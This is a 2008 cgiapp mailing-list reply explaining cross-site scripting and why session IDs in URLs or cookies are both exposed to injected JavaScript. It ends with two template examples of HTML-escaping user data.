[cgiapp] Persistence

Michael Peters mpeters at plusthree.com
Wed Feb 6 17:16:47 EST 2008



Mark Fuller wrote:
>>>> o Add the session id to the URL. This method has the most problems, and
>>>> is not recommended.
>>> What are the problems with the last option? ...
>> Google for XSS - Cross-site scripting attacks, as a starter.
> 
> I thought the problem with putting the session ID in the URL is that
> the user might copy/paste the URL to others. When they try to use it,
> the app would have no way to know it's not the real user?

While that is a problem (it holds true with any user identifiable information
not just sessions. You need to especially watch what you put into emails since
they will get forwarded) it's not XSS.

XSS is Cross Site Scripting. So you need 2 domains (hence the cross-site) and it
involves Javascript (can also be ActionScript/Flash, VBScript, or any other
future client-side scripting language). Basically it's problem of people
embedding Javascript into a page that others will see. That Javascript can steal
sessions, etc from the user who sees it. It doesn't matter if the session id is
in the URL or a cookie, Javascript can see both.

This is why escaping any data that could potentially come from a user is so
important.

  <tmpl_var foo escape=html>
or
  [% foo | html %]

-- 
Michael Peters
Developer
Plus Three, LP



More information about the cgiapp mailing list